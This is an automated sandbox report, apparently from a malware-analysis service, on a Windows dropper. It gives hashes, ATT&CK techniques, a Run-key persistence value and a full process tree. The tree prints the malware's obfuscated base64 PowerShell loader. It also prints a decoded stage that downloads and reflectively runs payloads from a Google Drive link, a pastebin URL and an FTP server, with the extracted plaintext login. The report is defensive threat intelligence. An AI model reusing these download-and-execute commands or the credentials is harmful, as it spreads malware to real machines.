25785577f4acd3a7dc0cd0287bf0beda056b3dc5ed612890ea2eef9d329d228e

General

Target

25785577f4acd3a7dc0cd0287bf0beda056b3dc5ed612890ea2eef9d329d228e.exe
Size

502KB
MD5

5d5474ba6cc296ae15413641aa55e3b1
SHA1

5d9e018f61c54caf387931e6bd4d7e12333bbc96
SHA256

25785577f4acd3a7dc0cd0287bf0beda056b3dc5ed612890ea2eef9d329d228e
SHA512

0c277f3c7a0c14ad6c3a032b653a98600c4f1b07aff941f88a3dde2bed2e88d5a023d35ef935b9e2dd43d0f3ebfca18ab30c274f8dd7028fd883fe160078ec70
SSDEEP

12288:TLMEalqxXblqoRX5qbfphLxaOdRSRW4H4444Cb0:HqaXNabfphLxaSRSRW4H4444Cb0

Score

10^/10

defense_evasion execution persistence

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

https://drive.google.com/uc?export=download&id=

Extracted

Credentials

Protocol: ftp
Host:
ftp.desckvbrat.com.br
Port:
21
Username:
desckvbrat1
Password:
developerpro21578Jp@@

Signatures

Blocklisted process makes network request 6 IoCs

flow	pid	Process
10	3012	powershell.exe
17	3012	powershell.exe
20	3012	powershell.exe
21	3012	powershell.exe
24	3012	powershell.exe
25	3012	powershell.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\Control Panel\International\Geo\Nation	25785577f4acd3a7dc0cd0287bf0beda056b3dc5ed612890ea2eef9d329d228e.exe
Key value queried	\REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\Control Panel\International\Geo\Nation	WScript.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Update Drivers NVIDEO_v = "cmd.exe /c start /min \"\" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Comman \". 'C:\\Users\\Admin\\AppData\\Local\\Microsoft\\LocalLow\\System Update\\etoiz.ps1' \";exit"	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2360	powershell.exe
3012	powershell.exe
368	powershell.exe
3280	powershell.exe

Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
defense_evasion

File Deletion
T1070.004

Drops file in Program Files directory 4 IoCs

description	ioc	Process
File created	C:\Program Files\__tmp_rar_sfx_access_check_240622703	25785577f4acd3a7dc0cd0287bf0beda056b3dc5ed612890ea2eef9d329d228e.exe
File created	C:\Program Files\hospedes_1.js	25785577f4acd3a7dc0cd0287bf0beda056b3dc5ed612890ea2eef9d329d228e.exe
File opened for modification	C:\Program Files\hospedes_1.js	25785577f4acd3a7dc0cd0287bf0beda056b3dc5ed612890ea2eef9d329d228e.exe
File opened for modification	C:\Program Files\%AppData%\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\Local Settings	25785577f4acd3a7dc0cd0287bf0beda056b3dc5ed612890ea2eef9d329d228e.exe

Suspicious behavior: EnumeratesProcesses 9 IoCs

pid	Process
2360	powershell.exe
2360	powershell.exe
3012	powershell.exe
3012	powershell.exe
3012	powershell.exe
368	powershell.exe
368	powershell.exe
3280	powershell.exe
3280	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	2360	powershell.exe
Token: SeDebugPrivilege	3012	powershell.exe
Token: SeDebugPrivilege	368	powershell.exe
Token: SeDebugPrivilege	3280	powershell.exe

Suspicious use of WriteProcessMemory 12 IoCs

description	pid	Process	procid_target
PID 1416 wrote to memory of 1912	1416	25785577f4acd3a7dc0cd0287bf0beda056b3dc5ed612890ea2eef9d329d228e.exe	82
PID 1416 wrote to memory of 1912	1416	25785577f4acd3a7dc0cd0287bf0beda056b3dc5ed612890ea2eef9d329d228e.exe	82
PID 1912 wrote to memory of 2360	1912	WScript.exe	83
PID 1912 wrote to memory of 2360	1912	WScript.exe	83
PID 2360 wrote to memory of 3012	2360	powershell.exe	85
PID 2360 wrote to memory of 3012	2360	powershell.exe	85
PID 3012 wrote to memory of 368	3012	powershell.exe	90
PID 3012 wrote to memory of 368	3012	powershell.exe	90
PID 3012 wrote to memory of 3280	3012	powershell.exe	91
PID 3012 wrote to memory of 3280	3012	powershell.exe	91
PID 3012 wrote to memory of 4424	3012	powershell.exe	92
PID 3012 wrote to memory of 4424	3012	powershell.exe	92

C:\Users\Admin\AppData\Local\Temp\25785577f4acd3a7dc0cd0287bf0beda056b3dc5ed612890ea2eef9d329d228e.exe
"C:\Users\Admin\AppData\Local\Temp\25785577f4acd3a7dc0cd0287bf0beda056b3dc5ed612890ea2eef9d329d228e.exe"
1⤵
- Checks computer location settings
- Drops file in Program Files directory
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1416
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Program Files\hospedes_1.js"
  2⤵
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  PID:1912
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $fLbjh = 'JA㍿pAFUAbg㍿KAGEAIAA9ACAAJA㍿oAG8Acw㍿0AC4AVg㍿lAHIAcw㍿pAG8AbgAuAE0AYQ㍿qAG8AcgAuAEUAcQ㍿1AGEAbA㍿zACgAMgApADsASQ㍿mACAAKAAgACQAaQ㍿VAG4ASg㍿hACAAKQAgAHsAJA㍿NAGkAUg㍿JAGQAIAA9ACAAWw㍿TAHkAcw㍿0AGUAbQAuAEkATwAuAFAAYQ㍿0AGgAXQA6ADoARw㍿lAHQAVA㍿lAG0AcA㍿QAGEAdA㍿oACgAKQA7AGQAZQ㍿sACAAKAAkAE0AaQ㍿SAEkAZAAgACsAIAAnAFwAVQ㍿wAHcAaQ㍿uAC4AbQ㍿zAHUAJwApADsAJA㍿SAFkARQ㍿hAEYAIAA9ACAAJw㍿oAHQAdA㍿wAHMAOgAvAC8AZA㍿yAGkAdg㍿lAC4AZw㍿vAG8AZw㍿sAGUALg㍿jAG8AbQAvAHUAYwA/AGUAeA㍿wAG8Acg㍿0AD0AZA㍿vAHcAbg㍿sAG8AYQ㍿kACYAaQ㍿kAD0AJwA7ACQAcw㍿CAGkAaQ㍿XACAAPQAgACQAZQ㍿uAHYAOg㍿QAFIATw㍿DAEUAUw㍿TAE8AUg㍿fAEEAUg㍿DAEgASQ㍿UAEUAQw㍿UAFUAUg㍿FAC4AQw㍿vAG4AdA㍿hAGkAbg㍿zACgAJwA2ADQAJwApADsAaQ㍿mACAAKAAgACQAcw㍿CAGkAaQ㍿XACAAKQAgAHsAJA㍿SAFkARQ㍿hAEYAIAA9ACAAKAAkAFIAWQ㍿FAGEARgAgACsAIAAnADEATg㍿hAHEAZA㍿OAFgAaQ㍿HAHYASQ㍿fAHEAMQ㍿SAFAAaw㍿hAHoARg㍿0AE0AeQ㍿nAG0AYQ㍿xAFQASg㍿YAHUANAAyACcAKQAgADsAfQ㍿lAGwAcw㍿lACAAewAkAFIAWQ㍿FAGEARgAgAD0AIAAoACQAUg㍿ZAEUAYQ㍿GACAAKwAgACcAMQ㍿nADEAag㍿tAFgAdQ㍿zAFgAOQ㍿tAGMAOQ㍿WAG0AaA㍿WAHIASg㍿KADIAWA㍿vAGYAWgAzAGEASw㍿fAGMATA㍿PAHQAJwApACAAOw㍿9ADsAJA㍿JAGEAbw㍿NAGkAIAA9ACAAKAAgAE4AZQ㍿3AC0ATw㍿iAGoAZQ㍿jAHQAIA㍿OAGUAdAAuAFcAZQ㍿iAEMAbA㍿pAGUAbg㍿0ACAAKQAgADsAJA㍿JAGEAbw㍿NAGkALg㍿FAG4AYw㍿vAGQAaQ㍿uAGcAIAA9ACAAWw㍿TAHkAcw㍿0AGUAbQAuAFQAZQ㍿4AHQALg㍿FAG4AYw㍿vAGQAaQ㍿uAGcAXQA6ADoAVQ㍿UAEYAOAAgADsAJA㍿JAGEAbw㍿NAGkALg㍿EAG8Adw㍿uAGwAbw㍿hAGQARg㍿pAGwAZQAoACQAVQ㍿SAEwASw㍿CACwAIAAkAE0AaQ㍿SAEkAZAAgACsAIAAnAFwAVQ㍿wAHcAaQ㍿uAC4AbQ㍿zAHUAJwApACAAOwAkAEEAVQ㍿yAEcARgAgAD0AIAAoACAAJw㍿DADoAXA㍿VAHMAZQ㍿yAHMAXAAnACAAKwAgAFsARQ㍿uAHYAaQ㍿yAG8Abg㍿tAGUAbg㍿0AF0AOgA6AFUAcw㍿lAHIATg㍿hAG0AZQAgACkAOw㍿JAHoAag㍿㍿AFEAIAA9ACAAKAAgACQATQ㍿pAFIASQ㍿kACAAKwAgACcAXA㍿VAHAAdw㍿pAG4ALg㍿tAHMAdQAnACAAKQAgADsAIA㍿wAG8Adw㍿lAHIAcw㍿oAGUAbA㍿sAC4AZQ㍿4AGUAIA㍿3AHUAcw㍿hAC4AZQ㍿4AGUAIA㍿JAHoAag㍿㍿AFEAIAAvAHEAdQ㍿pAGUAdAAgAC8Abg㍿vAHIAZQ㍿zAHQAYQ㍿yAHQAIAA7ACAAQw㍿vAHAAeQAtAEkAdA㍿lAG0AIAAnACUARA㍿DAFAASg㍿VACUAJwAgAC0ARA㍿lAHMAdA㍿pAG4AYQ㍿0AGkAbw㍿uACAAKAAgACQAQQ㍿VAHIARw㍿GACAAKwAgACcAXA㍿㍿AHAAcA㍿EAGEAdA㍿hAFwAUg㍿vAGEAbQ㍿pAG4AZw㍿cAE0AaQ㍿jAHIAbw㍿zAG8AZg㍿0AFwAVw㍿pAG4AZA㍿vAHcAcw㍿cAFMAdA㍿hAHIAdAAgAE0AZQ㍿uAHUAXA㍿QAHIAbw㍿nAHIAYQ㍿tAHMAXA㍿TAHQAYQ㍿yAHQAdQ㍿wACcAIAApACAALQ㍿mAG8Acg㍿jAGUAIAA7AHAAbw㍿3AGUAcg㍿zAGgAZQ㍿sAGwALg㍿lAHgAZQAgAC0AYw㍿vAG0AbQ㍿hAG4AZAAgACcAcw㍿sAGUAZQ㍿wACAAMQA4ADAAJwA7ACAAcw㍿oAHUAdA㍿kAG8Adw㍿uAC4AZQ㍿4AGUAIAAvAHIAIAAvAHQAIAAwACAALw㍿mACAAfQ㍿lAGwAcw㍿lACAAew㍿bAFMAeQ㍿zAHQAZQ㍿tAC4ATg㍿lAHQALg㍿TAGUAcg㍿2AGkAYw㍿lAFAAbw㍿pAG4AdA㍿NAGEAbg㍿hAGcAZQ㍿yAF0AOgA6AFMAZQ㍿yAHYAZQ㍿yAEMAZQ㍿yAHQAaQ㍿mAGkAYw㍿hAHQAZQ㍿WAGEAbA㍿pAGQAYQ㍿0AGkAbw㍿uAEMAYQ㍿sAGwAYg㍿hAGMAawAgAD0AIA㍿7ACQAdA㍿yAHUAZQ㍿9ADsAWw㍿TAHkAcw㍿0AGUAbQAuAE4AZQ㍿0AC4AUw㍿lAHIAdg㍿pAGMAZQ㍿QAG8AaQ㍿uAHQATQ㍿hAG4AYQ㍿nAGUAcg㍿dADoAOg㍿TAGUAYw㍿1AHIAaQ㍿0AHkAUA㍿yAG8AdA㍿vAGMAbw㍿sACAAPQAgAFsAUw㍿5AHMAdA㍿lAG0ALg㍿OAGUAdAAuAFMAZQ㍿jAHUAcg㍿pAHQAeQ㍿QAHIAbw㍿0AG8AYw㍿vAGwAVA㍿5AHAAZQ㍿dADoAOg㍿UAGwAcwAxADIAOwAkAHEAcA㍿kAGMAIAA9ACAAKA㍿OAGUAdwAtAE8AYg㍿qAGUAYw㍿0ACAATg㍿lAHQALg㍿XAGUAYg㍿DAGwAaQ㍿lAG4AdAApADsAJA㍿xAHAAZA㍿jAC4ARQ㍿uAGMAbw㍿kAGkAbg㍿nACAAPQAgAFsAUw㍿5AHMAdA㍿lAG0ALg㍿UAGUAeA㍿0AC4ARQ㍿uAGMAbw㍿kAGkAbg㍿nAF0AOgA6AFUAVA㍿GADgAOwAkAHEAcA㍿kAGMALg㍿DAHIAZQ㍿kAGUAbg㍿0AGkAYQ㍿sAHMAIAA9ACAAbg㍿lAHcALQ㍿vAGIAag㍿lAGMAdAAgAFMAeQ㍿zAHQAZQ㍿tAC4ATg㍿lAHQALg㍿OAGUAdA㍿3AG8Acg㍿rAEMAcg㍿lAGQAZQ㍿uAHQAaQ㍿hAGwAKAAnAGQAZQ㍿zAGMAaw㍿2AGIAcg㍿hAHQAMQAnACwAJw㍿kAGUAdg㍿lAGwAbw㍿wAGUAcg㍿wAHIAbwAyADEANQA3ADgASg㍿wAEAAQAAnACkAOwAkAFYAdA㍿hAEEARgAgAD0AIAAkAHEAcA㍿kAGMALg㍿EAG8Adw㍿uAGwAbw㍿hAGQAUw㍿0AHIAaQ㍿uAGcAKAAgACcAZg㍿0AHAAOgAvAC8AZA㍿lAHMAYw㍿rAHYAYg㍿yAGEAdAAxAEAAZg㍿0AHAALg㍿kAGUAcw㍿jAGsAdg㍿iAHIAYQ㍿0AC4AYw㍿vAG0ALg㍿iAHIALw㍿VAHAAYw㍿yAHkAcA㍿0AGUAcgAvADAAMgAvAEQATA㍿MADAAMQAuAHQAeA㍿0ACcAIAApADsAJA㍿xAHAAZA㍿jAC4AZA㍿pAHMAcA㍿vAHMAZQAoACkAOwAkAHEAcA㍿kAGMAIAA9ACAAKA㍿OAGUAdwAtAE8AYg㍿qAGUAYw㍿0ACAATg㍿lAHQALg㍿XAGUAYg㍿DAGwAaQ㍿lAG4AdAApADsAJA㍿xAHAAZA㍿jAC4ARQ㍿uAGMAbw㍿kAGkAbg㍿nACAAPQAgAFsAUw㍿5AHMAdA㍿lAG0ALg㍿UAGUAeA㍿0AC4ARQ㍿uAGMAbw㍿kAGkAbg㍿nAF0AOgA6AFUAVA㍿GADgAOwAkAFYAdA㍿hAEEARgAgAD0AIAAkAHEAcA㍿kAGMALg㍿EAG8Adw㍿uAGwAbw㍿hAGQAUw㍿0AHIAaQ㍿uAGcAKAAgACQAVg㍿0AGEAQQ㍿GACAAKQA7AFsAQg㍿5AHQAZQ㍿bAF0AXQAgACQAUg㍿YAGkAVg㍿qAF8AWQ㍿sAHQASA㍿LACAAPQAgAFsAUw㍿5AHMAdA㍿lAG0ALg㍿DAG8Abg㍿2AGUAcg㍿0AF0AOgA6AEYAcg㍿vAG0AQg㍿hAHMAZQA2ADQAUw㍿0AHIAaQ㍿uAGcAKAAgACQAVg㍿0AGEAQQ㍿GAC4AUg㍿lAHAAbA㍿hAGMAZQAoACAAJwCTIToAkyEnACAALAAgACcAQQAnACAAKQAgACkAOw㍿bAFMAeQ㍿zAHQAZQ㍿tAC4AQQ㍿wAHAARA㍿vAG0AYQ㍿pAG4AXQA6ADoAQw㍿1AHIAcg㍿lAG4AdA㍿EAG8AbQ㍿hAGkAbgAuAEwAbw㍿hAGQAKAAgACQAUg㍿YAGkAVg㍿qAF8AWQ㍿sAHQASA㍿LACAAKQAuAEcAZQ㍿0AFQAeQ㍿wAGUAKAAgACcAQw㍿sAGEAcw㍿zAEwAaQ㍿iAHIAYQ㍿yAHkAMwAuAEMAbA㍿hAHMAcwAxACcAIAApAC4ARw㍿lAHQATQ㍿lAHQAaA㍿vAGQAKAAgACcAcA㍿yAEYAVg㍿JACcAIAApAC4ASQ㍿uAHYAbw㍿rAGUAKAAkAG4AdQ㍿sAGwALAAgAFsAbw㍿iAGoAZQ㍿jAHQAWw㍿dAF0AIAAoACAAJw㍿lAG4AaQ㍿0AHMAaQ㍿jAGUAbg㍿hAGkAcg㍿kAGEALw㍿3AGEAcgAvAHQAZQ㍿uAC4Abg㍿pAGIAdA㍿zAGEAcAAvAC8AOg㍿zAHAAdA㍿0AGgAJwAgACwAIAAnACUARA㍿DAFAASg㍿VACUAJwAsACAAJw㍿0AHIAdQ㍿lADEAJwAgACkAIAApADsAfQA7AA==';$fLbjh = $fLbjh.replace('㍿','B') ;$fLbjh = [System.Convert]::FromBase64String( $fLbjh ) ;;;$fLbjh = [System.Text.Encoding]::Unicode.GetString( $fLbjh ) ;$fLbjh = $fLbjh.replace('%DCPJU%','C:\Program Files\hospedes_1.js') ;powershell $fLbjh
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2360
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$iUnJa = $host.Version.Major.Equals(2);If ( $iUnJa ) {$MiRId = [System.IO.Path]::GetTempPath();del ($MiRId + '\Upwin.msu');$RYEaF = 'https://drive.google.com/uc?export=download&id=';$sBiiW = $env:PROCESSOR_ARCHITECTURE.Contains('64');if ( $sBiiW ) {$RYEaF = ($RYEaF + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$RYEaF = ($RYEaF + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$IaoMi = ( New-Object Net.WebClient ) ;$IaoMi.Encoding = [System.Text.Encoding]::UTF8 ;$IaoMi.DownloadFile($URLKB, $MiRId + '\Upwin.msu') ;$AUrGF = ( 'C:\Users\' + [Environment]::UserName );IzjAQ = ( $MiRId + '\Upwin.msu' ) ; powershell.exe wusa.exe IzjAQ /quiet /norestart ; Copy-Item 'C:\Program Files\hospedes_1.js' -Destination ( $AUrGF + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$qpdc = (New-Object Net.WebClient);$qpdc.Encoding = [System.Text.Encoding]::UTF8;$qpdc.Credentials = new-object System.Net.NetworkCredential('desckvbrat1','developerpro21578Jp@@');$VtaAF = $qpdc.DownloadString( 'ftp://[email protected]/Upcrypter/02/DLL01.txt' );$qpdc.dispose();$qpdc = (New-Object Net.WebClient);$qpdc.Encoding = [System.Text.Encoding]::UTF8;$VtaAF = $qpdc.DownloadString( $VtaAF );[Byte[]] $RXiVj_YltHK = [System.Convert]::FromBase64String( $VtaAF.Replace( '↓:↓' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $RXiVj_YltHK ).GetType( 'ClassLibrary3.Class1' ).GetMethod( 'prFVI' ).Invoke($null, [object[]] ( 'enitsicenairda/war/ten.nibtsap//:sptth' , 'C:\Program Files\hospedes_1.js', 'true1' ) );};"
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:3012
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\Local\Microsoft\LocalLow\System Update\\x2.ps1"
        5⤵
        Adds Run key to start application
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:368
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Microsoft\LocalLow\System Update\etoiz.ps1"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in Program Files directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3280
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c del "C:\Program Files\hospedes_1.js"
        5⤵
        
        PID:4424

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

2

T1059

JavaScript

1

T1059.007

PowerShell

1

T1059.001

Persistence

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Defense Evasion

Indicator Removal

1

T1070

File Deletion

Modify Registry

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\hospedes_1.js

Filesize
11KB

MD5
19ddde9f3ba61841471b2821aebf8a1d

SHA1
b9be28a259b2a2c329b2a727d4cccdf07890e068

SHA256
53f57b59460fbc66a1904f2d571788b5717cbfa7e601ab467488ddc083b0fa17

SHA512
060c44a545ee2dc2463c876c4a9f53d9527cb13e347674289ccc6299dc917ef11beb41c8600468c56065fc2b2b2493d068b6178303d1f964ee83661719c26310

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
6cf293cb4d80be23433eecf74ddb5503

SHA1
24fe4752df102c2ef492954d6b046cb5512ad408

SHA256
b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8

SHA512
0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\LocalLow\System Update\etoiz.ps1

Filesize
68KB

MD5
a748a080cf59cde1acf51f95f74fb378

SHA1
9cec495fbf31e337fb45e07bcc177f0f313c022b

SHA256
16eb70b27b0255bd925fc060cd2375ac468f1aaf17d40ddf6731dd8ff852769d

SHA512
87af24d1f5f7c8f30135afdcc1f60548681695252a6b216a557758c5595c094e2854cc482f512ac5139df6fa40f1814ab584f9f46897c00d7a0401ec642849cd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\LocalLow\System Update\x2.ps1

Filesize
334B

MD5
cd3a4308531fd1ed21b629c03c7a6217

SHA1
847f9be78f7bd649de8528a5eb36a5b2adc83d23

SHA256
5af8a1e8df59bfea9a39ab2f22ceee0054fd342b0bb9cdc0904e35f31bf8d074

SHA512
0182130daf77d6a326291622d5204546791788288112f17236de4894b9578e2aa7aaa2bd0c28f4139117c35621a61277b30724499ab54abc1af260f458a1176c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
114bd92aa5acf02aa081d8733c1ac9ae

SHA1
55078427a9f48d40ba19c2ae1d4bf491d903b131

SHA256
e58c27649b5ded97c27e64102433dc1e6e8c902e52f63a0b202415bf5f43e4ea

SHA512
43eec856fba50a2b50e35c6d7d78fbcbbc3ae0c3ddd5275392110073c07b1afc902d1b288fe3c1930104078fc130fb8a375591139c746cd4bbda5234c405a6d3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
1a11402783a8686e08f8fa987dd07bca

SHA1
580df3865059f4e2d8be10644590317336d146ce

SHA256
9b1d1b468932a2d88548dc18504ac3066f8248079ecb083e919460bdb88398c0

SHA512
5f7f9f76d9d12a25fdc5b8d193391fb42c37515c657250fe01a9bfd9fe4cc4eab9d5ec254b2596ac1b9005f12511905f19fdae41f057062261d75bd83254b510

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vkhehayx.yb2.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/2360-10-0x0000016B40DA0000-0x0000016B40DC2000-memory.dmp

Filesize
136KB

Download
memory/3012-24-0x0000019C43980000-0x0000019C4398A000-memory.dmp

Filesize
40KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads